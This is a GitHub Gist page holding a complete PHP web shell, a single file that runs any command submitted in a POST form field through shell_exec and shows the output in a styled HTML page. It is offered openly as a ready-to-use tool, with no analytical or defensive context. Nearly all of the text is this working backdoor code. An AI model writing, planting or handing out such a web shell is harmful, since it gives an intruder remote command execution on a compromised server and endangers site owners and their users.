Created
November 4, 2020 04:49
-
-
Save rootsploit/9f681fa3b80335c93b00b4f9b27659bb to your computer and use it in GitHub Desktop.
PHP Web Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (!empty($_POST['cmd'])) { | |
$cmd = shell_exec($_POST['cmd']); | |
} | |
?> | |
<!DOCTYPE html> | |
<html lang="en"> | |
<!-- By Artyum (https://github.com/artyuum) --> | |
<head> | |
<meta charset="utf-8"> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
<title>Web Shell</title> | |
<style> | |
* { | |
-webkit-box-sizing: border-box; | |
box-sizing: border-box; | |
} | |
body { | |
font-family: sans-serif; | |
color: rgba(0, 0, 0, .75); | |
} | |
main { | |
margin: auto; | |
max-width: 850px; | |
} | |
pre, | |
input, | |
button { | |
border-radius: 5px; | |
} | |
pre, | |
input, | |
button { | |
background-color: #efefef; | |
} | |
label { | |
display: block; | |
} | |
input { | |
width: 100%; | |
background-color: #efefef; | |
border: 2px solid transparent; | |
} | |
input:focus { | |
outline: none; | |
background: transparent; | |
border: 2px solid #e6e6e6; | |
} | |
button { | |
border: none; | |
cursor: pointer; | |
margin-left: 5px; | |
} | |
button:hover { | |
background-color: #e6e6e6; | |
} | |
pre, | |
input, | |
button { | |
padding: 10px; | |
} | |
.form-group { | |
display: -webkit-box; | |
display: -ms-flexbox; | |
display: flex; | |
padding: 15px 0; | |
} | |
</style> | |
</head> | |
<body> | |
<main> | |
<h1>Web Shell</h1> | |
<h2>Execute a command</h2> | |
<form method="post"> | |
<label for="cmd"><strong>Command</strong></label> | |
<div class="form-group"> | |
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" | |
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required> | |
<button type="submit">Execute</button> | |
</div> | |
</form> | |
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> | |
<h2>Output</h2> | |
<?php if (isset($cmd)): ?> | |
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre> | |
<?php else: ?> | |
<pre><small>No result.</small></pre> | |
<?php endif; ?> | |
<?php endif; ?> | |
</main> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment